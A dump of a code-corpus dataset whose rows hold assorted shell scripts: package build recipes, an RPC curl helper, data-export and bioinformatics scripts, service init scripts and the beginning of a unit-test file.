blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
6e6d9f7e0d17b6827b92cfe49420bc3757170261
|
Shell
|
stjordanis/avalanche-cli
|
/cli/rpc/post.sh
|
UTF-8
| 1,512
| 3.15625
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/usr/bin/env bash
###############################################################################
function rpc_post {
    # POST a JSON-RPC request with curl.
    #   $1 - target URL
    #   $2 - request body (JSON)
    #   $3 - content-type header (default: content-type:application/json)
    # Environment toggles:
    #   AVAX_AUTH_HEADER - adds an authorization header when non-empty
    #   AVAX_ARGS_RPC    - extra curl arguments
    #   AVAX_SILENT_RPC / AVAX_VERBOSE_RPC - "1" adds --silent / --verbose
    #   AVAX_YES_RUN_RPC - "1" executes curl; otherwise only prints the command
    #   AVAX_DEBUG_RPC   - when printing, "1" skips password redaction
    #   AVAX_PIPE_RPC    - post-processing command(s) for the response
    local mime="${3-content-type:application/json}" ;
    local args="--url '${1}' --header '${mime}'" ;
    if [ -n "$AVAX_AUTH_HEADER" ] ; then
        args="${args} --header 'authorization:${AVAX_AUTH_HEADER}' --data '${2}'" ;
    else
        args="${args} --data '${2}'" ;
    fi
    # NOTE(review): ${#AVAX_ARGS_RPC} is the string length of the first
    # element, not the element count -- works as a non-empty check, but
    # confirm that is what was intended.
    if (( ${#AVAX_ARGS_RPC} > 0 )) ; then
        args="${args} ${AVAX_ARGS_RPC[*]}" ;
    fi
    if [ "$AVAX_SILENT_RPC" == "1" ] ; then
        args="${args} --silent" ;
    fi
    if [ "$AVAX_VERBOSE_RPC" == "1" ] ; then
        args="${args} --verbose" ;
    fi
    if [ "$AVAX_YES_RUN_RPC" != "1" ] ; then
        # Dry run: print the curl command; redact passwords unless debugging.
        if [ "$AVAX_DEBUG_RPC" != "1" ] ; then
            printf '%s %s\n' "curl" "${args}" \
                | sed 's/"password":"[^"]*"/"password":"…"/g' ;
        else
            printf '%s %s\n' "curl" "${args}" ;
        fi
    else
        # NOTE(review): AVAX_PIPE_RPC is eval'd as a scalar command here but
        # indexed as an associative array (keyed by MIME type) just below --
        # confirm which form callers are expected to set.
        if [ -n "$AVAX_PIPE_RPC" ] ; then
            eval "$AVAX_PIPE_RPC" ;
        fi
        if [ -n "${AVAX_PIPE_RPC[*]}" ] ; then
            if [ -n "${AVAX_PIPE_RPC[$mime]}" ] ; then
                eval curl "${args}" | ${AVAX_PIPE_RPC[$mime]} ;
            else
                eval curl "${args}" ;
            fi
        else
            eval curl "${args}" ;
        fi
    fi
}
###############################################################################
###############################################################################
| true
|
1ce5acf384c7a16da2b5eeb01473c7a21180512d
|
Shell
|
mp15/npg_conda
|
/recipes/nanopolish/0.8.5/build.sh
|
UTF-8
| 287
| 2.59375
| 3
|
[] |
no_license
|
#!/bin/sh
# Conda build script for nanopolish 0.8.5.
set -e

# Fetch vendored dependencies before building.
git submodule update --init --recursive

# Build against the conda environment's headers/libs in $PREFIX; the
# EIGEN/HDF5/HTS "noinstall" values presumably skip the bundled dependency
# builds -- confirm against the nanopolish Makefile.
make EIGEN=noinstall HDF5=noinstall HTS=noinstall CXXFLAGS="-I$PREFIX/include -I$PREFIX/include/eigen3" LDFLAGS="-L$PREFIX/lib"

# There is no install target in the Makefile
mkdir -p "$PREFIX/bin"
cp nanopolish "$PREFIX/bin/"
| true
|
69038ff51fd139a365cd4fb29e500d4a238d4f8c
|
Shell
|
shuuuuun/static-website-cfn
|
/bin/cfn-cancel
|
UTF-8
| 183
| 2.546875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
set -eu

# Cancel an in-progress CloudFormation stack update.
# Reads AWS_PROFILE and STACK_NAME from the repo-level "env" file.

# Resolve the repository root (parent of this script's directory).
# "$0" is quoted so paths containing spaces survive; && ensures we do not
# fall back to the caller's cwd when the cd fails.
ROOT_PATH="$(cd "$(dirname "$0")/.." && pwd)"

# '.' is the POSIX spelling of 'source' -- this script runs under /bin/sh,
# where 'source' is not guaranteed to exist.
. "$ROOT_PATH/env"

aws cloudformation cancel-update-stack \
  --profile "$AWS_PROFILE" \
  --stack-name "$STACK_NAME"
| true
|
f9078ce9667f157e17ff1610bfcc99ca4329b7e0
|
Shell
|
AkBKukU/MinecraftServerSuite
|
/webScrapingTest.sh
|
UTF-8
| 225
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
# webDataParsing
# Reads web pages to get version numbers and download links.
# Smoke test: loads the parsing library (if present) and prints the newest
# version together with its download link.

# Pull in the helpers (getNewestVersion / getNewLink) when the library
# script sits alongside this one.
if [ -f './webDataParsing.sh' ]
then
    source ./webDataParsing.sh
fi

# Presumably read by the sourced helpers to select the server flavour --
# confirm against webDataParsing.sh.
serverType="vanilla"

echo "$(getNewestVersion): $(getNewLink)"
| true
|
762d470947148647bde6f33a230dd48286a94c64
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/edb-debugger-git/PKGBUILD
|
UTF-8
| 1,726
| 2.859375
| 3
|
[] |
no_license
|
# Maintainer: maz_1 <ohmygod19993 at gmail dot com>

# PKGBUILD for the git snapshot of edb-debugger.
_pkgname=edb-debugger
pkgname=$_pkgname-git
pkgver=r906.863ea6a
pkgrel=1
pkgdesc="EDB (Evan's Debugger) is a binary mode debugger with the goal of having usability on par with OllyDbg. Git version"
arch=('i686' 'x86_64')
url='http://www.codef00.com/projects#debugger'
license=('GPL2')
depends=('qt5-base' 'capstone' 'qt5-xmlpatterns')
makedepends=('boost>=1.35.0')
install=edb.install
# qhexview is cloned separately and wired in as a submodule in prepare().
source=("git+https://github.com/eteran/edb-debugger.git"
        "git+https://github.com/eteran/qhexview.git"
        'edb.desktop')
md5sums=('SKIP'
         'SKIP'
         '8844cd95efef848f8f4a444259491961')

# Version from git metadata: <tag>.r<commits-since-tag>.<hash>, falling
# back to r<revision-count>.<hash> when no tag is reachable.
pkgver() {
  cd $_pkgname
  if git_version=$( git describe --long --tags 2>/dev/null ); then
    IFS='-' read last_tag tag_rev commit <<< "$git_version"
    printf '%s.r%s.%s' "$last_tag" "$tag_rev" "$commit"
  else
    printf "r%s.%s" "$(git rev-list --count HEAD)" "$(git rev-parse --short HEAD)"
  fi
}

# Point the qhexview submodule at the locally cloned mirror so the build
# does not hit the network again.
prepare() {
  cd $_pkgname/src
  git submodule init qhexview
  git config submodule.qhexview.url ../../qhexview
  git submodule update qhexview
}

build() {
  cd $_pkgname
  # Install under /usr instead of the upstream default /usr/local.
  sed -i "s:/usr/local:/usr:g" common.pri
  qmake-qt5 -makefile DEFAULT_PLUGIN_PATH="/usr/lib/edb/"
  make
}

package() {
  cd $_pkgname
  # install to pkg dir
  make INSTALL_ROOT="$pkgdir" install
  # correct /usr/lib64 -> /usr/lib on x86_64
  [ "$CARCH" = "x86_64" ] && (mv "$pkgdir/usr/lib64" "$pkgdir/usr/lib")
  # icons
  install -Dm644 src/images/edb48-logo.png "$pkgdir/usr/share/pixmaps/edb.png"
  install -Dm644 src/images/edb48-logo.png "$pkgdir/usr/share/icons/hicolor/48x48/apps/edb.png"
  # install desktop file
  cd ..
  install -Dm644 edb.desktop "$pkgdir/usr/share/applications/edb.desktop"
}
| true
|
3eee75f6875d40ea71947c7f65a433eaa57e115f
|
Shell
|
benranco/docs
|
/scripts/extractOnlySeqIdsFromFastaFiles.sh
|
UTF-8
| 763
| 4.125
| 4
|
[] |
no_license
|
#!/bin/bash
echo "extractOnlySeqIdsFromFastaFiles.sh"

###########################################
# Editable parameters

inFolder="."
outFolder="."
# make sure the input file naming conventions match this and are consistent for all files
inFilenameEnd=".fasta"
outFilenamePrefix="seqIds_"

###########################################
# Execution code

# Iterate with a shell glob instead of parsing `ls | grep` output, which
# breaks on filenames containing whitespace or glob metacharacters.
for path in "$inFolder"/*"$inFilenameEnd"
do
  # Without nullglob an unmatched pattern passes through literally; skip it.
  [ -e "$path" ] || continue
  f=$(basename "$path")
  echo "Processing $f."
  # Extract all seq ids from the .fasta file. The grep -oE option only prints
  # the segment of the matching lines that contains the matching string
  # (\S matches any non-whitespace character). The sed command replaces all
  # occurrences of ">" with "".
  grep -oE "^>\S*" "$path" | sed 's/>//g' > "$outFolder/$outFilenamePrefix$f"
done
| true
|
4ea22ca9dbdb6febed91b902a9490c49196f9ea4
|
Shell
|
kevinmao/fcc-nnc
|
/viz/topwords.sh
|
UTF-8
| 483
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash
# global vars
# Mallet_Data and Report_Data are presumably defined here -- confirm
# against ../config.sh.
source ../config.sh

mkdir -p ${Report_Data}

#######################################
# calculate word counts for top5 topics
#######################################
Data="${Mallet_Data}/unigram/20"
doc_topics="${Data}/infer.doc_topics.txt"
topic_keys="${Data}/topic_keys.txt"
word_topic_counts="${Data}/word_topic_counts.txt"
output=${Report_Data}/topwords.txt

# Aggregate the Mallet topic-model outputs into a single top-words report.
python words4Topics.py -d ${doc_topics} -t ${topic_keys} -w ${word_topic_counts} > ${output}
| true
|
ef279164b583ca393a962c183fce506331b03c84
|
Shell
|
mohancggrl/nandha
|
/sh.sh
|
UTF-8
| 964
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash

# Sort package files from /tmp/mohan into per-environment directories under
# /tmp/nandha, keyed by the environment token embedded in each filename
# (last '-'-separated field with its extension stripped).

wsp="/tmp/nandha"
dt="/tmp/mohan"
# Create the workspace before cd'ing so the cd cannot silently leave us in
# the caller's directory.
mkdir -p "$wsp"
cd "$wsp" || exit 1

env1="$wsp/db/package/ec20.5/prod"
env2="$wsp/db/package/ec20.5/preprod"
env3="$wsp/db/package/ec20.5/qa"
env4="$wsp/db/package/ec20.5/uat"

mkdir -p "$wsp"/db/package/ec20.5/{prod,preprod,uat,qa}
#chown -R jenkins:jenkins $wsp/package/*
chmod -R 777 "$wsp"/db/package/*

# Glob instead of parsing `ls` output; safe for names with spaces.
for path in "$dt"/*; do
	[ -e "$path" ] || continue
	filename=$(basename "$path")
	# Environment token: last '-' field of the name, extension removed.
	IFS='-' read -ra ADDR <<< "$filename"
	a=${ADDR[-1]}
	IFS='.' read -ra AD <<< "$a"
	b=${AD[0]}
	if [ "$b" == "prod" ]; then
		mv "$dt/$filename" "$env1"
	# NOTE(review): "prepod" looks like a typo for "preprod", but it must
	# match the actual filename convention -- confirm before changing.
	elif [ "$b" == "prepod" ]; then
		mv "$dt/$filename" "$env2"
	elif [ "$b" == "qc" ]; then
		mv "$dt/$filename" "$env3"
	elif [ "$b" == "uat" ]; then
		mv "$dt/$filename" "$env4"
	else
		# Unrecognized environment: copy the file to every environment dir.
		# (BUG FIX: a stray argument-less `mv` followed this line in the
		# original and always failed; removed.)
		xargs -n 1 cp -v "$dt/$filename" <<< "$env1 $env2 $env3 $env4"
	fi
done
| true
|
7ac20109ae3b2a7b0e60c012445770a383c07890
|
Shell
|
ReadMoa/web-service
|
/tools/serving/update_serving_data.sh
|
UTF-8
| 651
| 3.390625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#
# Should execute under the root directory (web-service)
# $ ./tools/serving/update_serving_data.sh test
#
# Runs tools/serving/update_serving_data.py in the requested mode and
# reports the elapsed wall-clock time.

echo "----------------------------------------------"
echo "START updating serving storage"
echo "----------------------------------------------"

START=$(date +%s)

# Take the first argument as 'mode'
mode=$1

# Run the command; $mode is quoted so an empty or space-containing
# argument is passed through intact.
PYTHONPATH=./ python3 tools/serving/update_serving_data.py --mode="$mode"

END=$(date +%s)
# Integer subtraction needs no external bc process.
DIFF=$(( END - START ))

echo "----------------------------------------------"
echo "COMPLETED updating serving storage (time passed: $DIFF seconds)"
echo "----------------------------------------------"
| true
|
a3353368b4774ace7205b5ae5a3298f0d5ba63f3
|
Shell
|
KaOSx/main
|
/python3-pygments/PKGBUILD
|
UTF-8
| 727
| 2.6875
| 3
|
[] |
no_license
|
# PKGBUILD for the KaOS python3-pygments package (PEP 517 wheel build).
pkgname=python3-pygments
pkgver=2.16.1
pkgrel=1
pkgdesc="Python syntax highlighter"
arch=('x86_64')
url="https://pygments.org/"
license=('BSD')
depends=('python3')
makedepends=('python3-build' 'python3-installer' 'python3-setuptools' 'python3-wheel')
source=("https://pypi.org/packages/source/P/Pygments/Pygments-${pkgver}.tar.gz")
sha256sums=('1daff0494820c69bc8941e407aa20f577374ee88364ee10a98fdbe0aece96e29')

build() {
  cd Pygments-${pkgver}
  # -n: no build isolation, -w: build the wheel only.
  python3 -m build -nw
}

package() {
  cd Pygments-${pkgver}
  python3 -m installer --destdir=${pkgdir} dist/*.whl
  # Shell completion and the BSD license text are not shipped by the wheel.
  install -Dm644 external/pygments.bashcomp ${pkgdir}/etc/bash_completion.d/pygments
  install -Dm644 LICENSE ${pkgdir}/usr/share/licenses/${pkgname}/LICENSE
}
| true
|
e28822f384e0fc0d02ebad0632c81a08f24d1096
|
Shell
|
heavysink/repo
|
/archlinuxcn/gtk3-no-tracker/PKGBUILD
|
UTF-8
| 2,886
| 2.640625
| 3
|
[] |
no_license
|
# Maintainer: Jan Alexander Steffens (heftig) <heftig@archlinux.org>
# Contributor: Ionut Biru <ibiru@archlinux.org>

# gtk3 rebuilt with the tracker3 search backend disabled.
pkgbase=gtk3-no-tracker
# NOTE(review): only gtk3-no-tracker is listed here, yet package_gtk3-docs /
# package_gtk3-demos below are still defined and package_gtk3-no-tracker
# stages files into a "demo" dir -- presumably leftovers from the upstream
# split PKGBUILD; confirm before pruning.
pkgname=(gtk3-no-tracker)
pkgver=3.24.33
pkgrel=1
epoch=1
pkgdesc="GObject-based multi-platform GUI toolkit"
arch=(x86_64)
url="https://www.gtk.org/"
depends=(atk cairo libxcursor libxinerama libxrandr libxi libepoxy gdk-pixbuf2
         dconf libxcomposite libxdamage pango shared-mime-info at-spi2-atk
         wayland libxkbcommon adwaita-icon-theme json-glib librsvg
         desktop-file-utils mesa cantarell-fonts libcolord rest libcups
         fribidi iso-codes libcloudproviders gtk-update-icon-cache)
makedepends=(gobject-introspection gtk-doc git glib2-docs sassc meson
             wayland-protocols)
license=(LGPL)
_commit=8ff9b2f83ff491cbfcbf9b30c706bd917679e7cc # tags/3.24.33^0
source=("git+https://gitlab.gnome.org/GNOME/gtk.git#commit=$_commit"
        gtk-query-immodules-3.0.hook)
sha256sums=('SKIP'
            'a0319b6795410f06d38de1e8695a9bf9636ff2169f40701671580e60a108e229')

# Rewrite `git describe` output into a pacman-friendly version string.
pkgver() {
  cd gtk
  git describe --tags | sed 's/[^-]*-g/r&/;s/-/+/g'
}

prepare() {
  cd gtk
}

build() {
  CFLAGS+=" -DG_DISABLE_CAST_CHECKS"
  local meson_options=(
    -D broadway_backend=true
    -D cloudproviders=true
    # The point of this rebuild: no tracker3 search backend.
    -D tracker3=false
    -D colord=yes
    -D gtk_doc=false
    -D man=true
  )
  arch-meson gtk build "${meson_options[@]}"
  meson compile -C build
}

# Move the given files out of $pkgdir into the staging dir $srcdir/$1 so a
# later package_*() can ship them; prunes any directories left empty.
_pick() {
  local p="$1" f d; shift
  for f; do
    d="$srcdir/$p/${f#$pkgdir/}"
    mkdir -p "$(dirname "$d")"
    mv "$f" "$d"
    rmdir -p --ignore-fail-on-non-empty "$(dirname "$f")"
  done
}

package_gtk3-no-tracker() {
  optdepends=('evince: Default print preview command')
  provides=(gtk3-print-backends libgtk-3.so libgdk-3.so libgailutil-3.so gtk3=$pkgver)
  conflicts=(gtk3-print-backends gtk3)
  replaces=("gtk3-print-backends<=3.22.26-1")
  install=gtk3.install

  meson install -C build --destdir "$pkgdir"

  # Default GTK settings shipped with the package.
  install -Dm644 /dev/stdin "$pkgdir/usr/share/gtk-3.0/settings.ini" <<END
[Settings]
gtk-icon-theme-name = Adwaita
gtk-theme-name = Adwaita
gtk-font-name = Cantarell 11
END

  install -Dt "$pkgdir/usr/share/libalpm/hooks" -m644 gtk-query-immodules-3.0.hook

  cd "$pkgdir"

  # gtk-update-icon-cache is provided by its own package.
  rm usr/bin/gtk-update-icon-cache
  rm usr/share/man/man1/gtk-update-icon-cache.1

  # Stage the demo applications out of this package.
  _pick demo usr/bin/gtk3-{demo,demo-application,icon-browser,widget-factory}
  _pick demo usr/share/applications/gtk3-{demo,icon-browser,widget-factory}.desktop
  _pick demo usr/share/glib-2.0/schemas/org.gtk.{Demo,exampleapp}.gschema.xml
  _pick demo usr/share/icons/hicolor/*/apps/gtk3-{demo,widget-factory}[-.]*
  _pick demo usr/share/man/man1/gtk3-{demo,demo-application,icon-browser,widget-factory}.1
}

package_gtk3-docs() {
  pkgdesc+=" (documentation)"
  depends=()

  mv docs/* "$pkgdir"
}

package_gtk3-demos() {
  pkgdesc+=" (demo applications)"
  depends=(gtk3)

  mv demo/* "$pkgdir"
}

# vim:set ts=2 sw=2 et:
| true
|
e1c72fef32e827e0101aa0e3421ae44628e7892b
|
Shell
|
TheRealXG/Calculator
|
/docker/static_analysis/usr/tmp/start.sh
|
UTF-8
| 183
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash

# Entry point for the static-analysis container: locate the mounted source
# volume and hand off to its start_static_analysis.sh script.

# Default the volume mount point when the caller did not provide one.
if [ -z "$SRC_VOL" ]; then
    export SRC_VOL="/volume"
fi

chmod +x "$SRC_VOL/testScripts/start_static_analysis.sh"

# Abort rather than run the script from the wrong directory if cd fails.
cd "$SRC_VOL" || exit 1

"$SRC_VOL/testScripts/start_static_analysis.sh"
| true
|
f96d076eb5e9d8549efbae78d11f67729dda2bc1
|
Shell
|
TakehiroTada/hub-projects-collection-script
|
/hub-projects-collection-script.sh
|
UTF-8
| 938
| 3.765625
| 4
|
[] |
no_license
|
#!/bin/bash

# Clone each repository listed in the CSV dataset and collect its README
# (any common spelling) into ../tmp, numbered by row.

# Repository dataset (CSV; column 12 = user, column 4 = repo name)
REPOSITORY_LIST='./sample_dataset.csv'
# Working directory
WORKING_DIR='/home/take/develop/hub-projects-collection-script'

cd "$WORKING_DIR" || exit 1

i=1
while read row; do
    USERNAME=$(echo "${row}" | cut -d , -f 12)
    REPO_NAME=$(echo "${row}" | cut -d , -f 4)
    REPO_URI="https://github.com/${USERNAME}/${REPO_NAME}"
    echo "$REPO_URI"
    git clone "$REPO_URI"
    # BUG FIX: the original tested `-d $REPO_URI` -- a URL is never a
    # directory, so the whole branch was dead code. Test the cloned
    # directory instead.
    if [ -d "$REPO_NAME" ]; then
        echo "Repository exists."
        cd "$REPO_NAME"
        git checkout master
        git pull
        FILE_LIST=("README.md" "readme.md" "README.MD" "readme.MD" "readme.rst" "README.RST" "README.rst")
        j=0
        for FILE in "${FILE_LIST[@]}"; do
            if [ -e "$FILE" ]; then
                echo "$FILE"
                echo "File exists."
                cp "$FILE" "../tmp/${i}_${REPO_NAME}_${FILE}"
            fi
            j=$((j + 1))
        done
        # Return to the workspace BEFORE deleting the clone; the original
        # tried to remove ./REPO_NAME from inside the repository itself.
        cd "$WORKING_DIR"
        rm -r "./${REPO_NAME}"
    fi
    cd "$WORKING_DIR"
    i=$((i + 1))
done < "$REPOSITORY_LIST"
| true
|
72925a13fcfef65513a9aa9c6add2db44cb3d082
|
Shell
|
fredcollman/dotfiles
|
/bin/hotfix-done.sh
|
UTF-8
| 372
| 3.0625
| 3
|
[] |
no_license
|
#!/bin/sh
set -e

# git-flow style hotfix finisher: merge hotfix/<name> (first argument) into
# both the master and develop branches, then delete the hotfix branch.
hotfix_done() {
    # Branch names come from git-flow's configuration keys.
    MASTER_BRANCH=$(git config --get gitflow.branch.master)
    DEV_BRANCH=$(git config --get gitflow.branch.develop)
    HF_BRANCH="hotfix/$1"
    git checkout "$MASTER_BRANCH" && \
    git merge --no-ff "$HF_BRANCH" && \
    git checkout "$DEV_BRANCH" && \
    git merge --no-ff "$HF_BRANCH" && \
    git branch -d "$HF_BRANCH"
}

# "$@" (quoted) keeps a branch name containing spaces as one argument;
# the original unquoted $@ would have split it.
hotfix_done "$@"
| true
|
7d5c843931036d7d7ab9d7427fbc5d86eab5ae43
|
Shell
|
diggzhang/shangzuoautorobot
|
/userAttrClass.sh
|
UTF-8
| 756
| 2.71875
| 3
|
[] |
no_license
|
# Daily export of user-attribute collections from MongoDB into dated CSV
# files, then archive the day's output with 7zip.

# NOTE(review): the (...) form makes these one-element arrays; a plain
# scalar assignment would behave identically here.
YEAR=(`date -d -0day '+%Y'`)
MONTH=(`date -d -0day '+%m'`)
DAY=(`date -d -0day '+%d'`)

# Shared mongo invocation (timed, quiet) against the "onions" database.
MONGOINSTANCE="time mongo --quiet --host 10.8.8.111 onions"

echo "++++++++++++++++++++++++++"
date
echo "daily update user atrribute"

# Each .js script dumps one collection as CSV on stdout.
echo "running dim_user"
$MONGOINSTANCE ./dim_user.js > data_dim_user_$YEAR$MONTH$DAY.csv

echo "running user_school"
$MONGOINSTANCE ./user_school.js > data_user_school_$YEAR$MONTH$DAY.csv

echo "running dim_rooms"
$MONGOINSTANCE ./dim_rooms.js > data_dim_rooms_$YEAR$MONTH$DAY.csv

echo "running dim_circles"
$MONGOINSTANCE ./dim_circles.js > data_dim_circles_$YEAR$MONTH$DAY.csv

# Move today's CSVs into ./data, archive them, then clear the CSVs.
echo "compress all csv"
mv *.csv ./data
7za a daily_user_attr_csv_$YEAR$MONTH$DAY.7z ./data/*
rm ./data/*.csv
date
echo "--------------------------"
| true
|
cb95ae97de9a5d709f646f7a3b33fd80289f9731
|
Shell
|
dymaxionlabs/satlomas-exp
|
/script/predict_rf_all.sh
|
UTF-8
| 2,401
| 3.390625
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
# Feature-extraction + random-forest classification pipeline (Orfeo ToolBox
# CLI tools) over every date range of the full dataset.
set -xeu -o pipefail

# NOTE: the helper functions below read the globals $dataset_dir and
# $results_dir, which predict_set assigns per date range before calling them.

# Resample image $1 onto the grid of reference image $2 (both under
# $dataset_dir), writing the result into the feats/ directory.
function superimpose {
  otbcli_Superimpose \
    -inr $dataset_dir/$2.tif \
    -inm $dataset_dir/$1.tif \
    -out $results_dir/feats/$1.tif
}

# Local statistics + Haralick textures for every band of every input:
# 8 bands of s2_10m, 6 of s2_20m, 3 of s1, and the single srtm band.
function extract_all_features {
  for band in $(seq 1 8); do
    extract_local_stats s2_10m $band
    extract_haralick s2_10m $band
  done
  for band in $(seq 1 6); do
    extract_local_stats s2_20m $band
    extract_haralick s2_20m $band
  done
  for band in $(seq 1 3); do
    extract_local_stats s1 $band
    extract_haralick s1 $band
  done
  extract_local_stats srtm 1
  extract_haralick srtm 1
}

# Local statistic features for band $2 of image $1 (3-pixel radius).
function extract_local_stats {
  otbcli_LocalStatisticExtraction \
    -in $results_dir/feats/$1.tif \
    -channel $2 \
    -radius 3 \
    -out $results_dir/feats/local_stats_$1_$2.tif
}

# "simple" Haralick texture features for band $2 of image $1.
function extract_haralick {
  otbcli_HaralickTextureExtraction \
    -in $results_dir/feats/$1.tif \
    -channel $2 \
    -texture simple \
    -parameters.min 0 \
    -parameters.max 0.3 \
    -out $results_dir/feats/haralick_$1_$2.tif
}

# Stack every per-band feature image in feats/ into one features.tif.
function concatenate_images {
  current_dir=$(pwd)
  cd $results_dir/feats
  otbcli_ConcatenateImages \
    -il $(ls) \
    -out $results_dir/features.tif
  cd $current_dir
}

# Apply the trained random-forest model to the stacked feature image.
function classify_image {
  otbcli_ImageClassifier \
    -in $results_dir/features.tif \
    -model data/results/rf_model.yaml \
    -out $results_dir/cover.tif
}

# Vectorize/clean the raster cover map into GeoJSON.
function post_process_result {
  script/post_process_sen.sh $results_dir/cover.tif $results_dir/cover.geojson
}

# Run the whole pipeline for each space-separated date range in $1,
# skipping stages whose outputs already exist (cheap resume support).
function predict_set {
  date_ranges=$1
  for date_range in $date_ranges; do
    dataset_dir=~/satlomas-exp/data/images/full/$date_range
    results_dir=~/satlomas-exp/data/results/full/$date_range
    if [ ! -f "$results_dir/cover.tif" ]; then
      mkdir -p $results_dir/feats
      # Copy S2 10m image to feats/
      cp $dataset_dir/s2_10m.tif $results_dir/feats/s2_10m.tif
      # Superimpose the other images in reference to S2 10m image
      superimpose s2_20m s2_10m
      superimpose s1 s2_10m
      superimpose srtm s2_10m
      extract_all_features
      concatenate_images
      classify_image
    fi
    if [ ! -f "$results_dir/cover.geojson" ]; then
      post_process_result
    fi
  done
}

predict_set "201811_201812 201901_201902 201903_201904 201905_201906 201907_201908 201909_201910"
| true
|
e0e54eedd4f54eeb6641ef3863ec5289ff437af7
|
Shell
|
johmathe/slack
|
/roles/bach_svn/scripts/postinstall
|
UTF-8
| 512
| 2.734375
| 3
|
[] |
no_license
|
#!/bin/bash

# Post-install for the SVN role: enable Apache SVN modules, install the
# repository-index stylesheet, and create the shared /home/svn area with
# group write access for Apache (www-data).

SVN_ROOT=/home/svn

a2enmod ssl dav_svn

cp /usr/share/doc/libapache2-mod-svn/examples/svnindex.xsl /var/www/
# Use the portable USER:GROUP form; the '.' separator is deprecated.
chown root:www-data /var/www/svnindex.xsl
chmod g+r /var/www/svnindex.xsl

# Refuse to clobber an existing SVN root.
[ -d "$SVN_ROOT" ] && echo "$SVN_ROOT already exists, aborting." && exit 1

addgroup svnadm
# Consistently use $SVN_ROOT instead of repeating the literal path.
mkdir "$SVN_ROOT"
chgrp svnadm "$SVN_ROOT"
# setgid dir: new repositories inherit the svnadm group.
chmod 2770 "$SVN_ROOT"
# Default + effective ACLs so Apache can write new repositories.
setfacl -d -m g:www-data:rwx "$SVN_ROOT"
setfacl -m g:www-data:rwx "$SVN_ROOT"

chmod 755 /usr/local/bin/svnnew
chmod 755 /usr/local/bin/svndel

service apache2 restart
| true
|
26437c21e941d4f1b5be1bc1161a16d5d638a72a
|
Shell
|
smklancher/ANE-Android-Install-Tracking
|
/Build/buildANE/buildANE.sh
|
UTF-8
| 860
| 2.625
| 3
|
[] |
no_license
|
# Package the ANESample AIR Native Extension for Android using the Flash
# Builder AIR SDK's adt tool.
adt="/Applications/Adobe Flash Builder 4.7/eclipse/plugins/com.adobe.flash.compiler_4.7.0.349722/AIRSDK/bin/adt"
# Eclipse project holding the compiled Java side of the extension.
nativedir="/Users/markhood/Documents/Eclipse64/ANESample_java"

echo "********************************************************************"
echo " - creating ANE package"

# Start from a clean Android-ARM staging directory.
rm -rf Android-ARM/*
rm -f SampleASExtension.ane library.swf
mkdir -p Android-ARM

# Pull library.swf out of the ActionScript SWC, then stage it together
# with the native jar and its resources.
unzip ../ANESample/bin/ANESample.swc library.swf
cp library.swf Android-ARM
cp "$nativedir"/ANESample.jar Android-ARM
cp -r "$nativedir"/res Android-ARM

# Build the unsigned ANE (the signed PKCS12 variant is kept below for reference).
"$adt" -package -target ane SampleASExtension.ane extension.xml -swc ../ANESample/bin/ANESample.swc -platform Android-ARM -C Android-ARM .
#"$adt" -package -storetype PKCS12 -keystore cer.p12 -storepass password -target ane SampleASExtension.ane extension.xml -swc ../ANESample/bin/ANESample.swc -platform Android-ARM -C Android-ARM .
| true
|
f641d1e570f01f35332d731481756de55f2dbd60
|
Shell
|
bol-van/zapret
|
/init.d/macos/zapret
|
UTF-8
| 915
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/sh

# macOS init script for zapret: dispatches start/stop/restart actions for
# the zapret daemons and the packet-filter firewall rules.

EXEDIR="$(dirname "$0")"
ZAPRET_BASE="$EXEDIR/../.."
ZAPRET_BASE="$(cd "$ZAPRET_BASE"; pwd)"

# zapret_* helpers and pf_table_reload are defined here.
. "$EXEDIR/functions"

case "$1" in
	start)
		zapret_run_daemons
		# Firewall rules are applied only when INIT_APPLY_FW=1.
		[ "$INIT_APPLY_FW" != "1" ] || zapret_apply_firewall
		;;
	stop)
		[ "$INIT_APPLY_FW" != "1" ] || zapret_unapply_firewall
		zapret_stop_daemons
		;;
	restart)
		"$0" stop
		"$0" start
		;;
	start-fw|start_fw)
		zapret_apply_firewall
		;;
	stop-fw|stop_fw)
		zapret_unapply_firewall
		;;
	# BUG FIX: this arm previously read "restart-fw|stop_fw"; the stray
	# stop_fw alternative was shadowed by the arm above, and the
	# underscore form restart_fw was not accepted at all.
	restart-fw|restart_fw)
		zapret_restart_firewall
		;;
	reload-fw-tables|reload_fw_tables)
		pf_table_reload
		;;
	start-daemons|start_daemons)
		zapret_run_daemons
		;;
	stop-daemons|stop_daemons)
		zapret_stop_daemons
		;;
	restart-daemons|restart_daemons)
		zapret_restart_daemons
		;;
	*)
		N="$SCRIPT/$NAME"
		echo "Usage: $N {start|stop|start-fw|stop-fw|restart-fw|reload-fw-tables|start-daemons|stop-daemons|restart-daemons}" >&2
		exit 1
		;;
esac
| true
|
73eed1c027dba9f2e3da0b91ca654eb8c3ebc0f7
|
Shell
|
PandikKumar/dell-devops
|
/ci-scripts/test/unit/pingfederate/configure-delegated-admin/03-idp-adapter-mapping-tests.sh
|
UTF-8
| 1,009
| 2.96875
| 3
|
[] |
no_license
|
#!/bin/bash

# shunit2 unit tests for set_idp_adapter_mapping from
# configure-delegated-admin-utils.sh; external calls are mocked by
# redefining the functions they go through.

# Source the script we're testing
# Suppress env vars noise in the test output
. "${HOOKS_DIR}"/utils.lib.sh > /dev/null
. "${HOOKS_DIR}"/util/configure-delegated-admin-utils.sh > /dev/null

# Mock up get_idp_adapter_mapping, 404 will cause code to create new IDP adapter mapping.
get_idp_adapter_mapping() {
    export DA_IDP_ADAPTER_MAPPING_RESPONSE="HTTP status code: 404"
}

testSadPathCreateIdpMapping() {
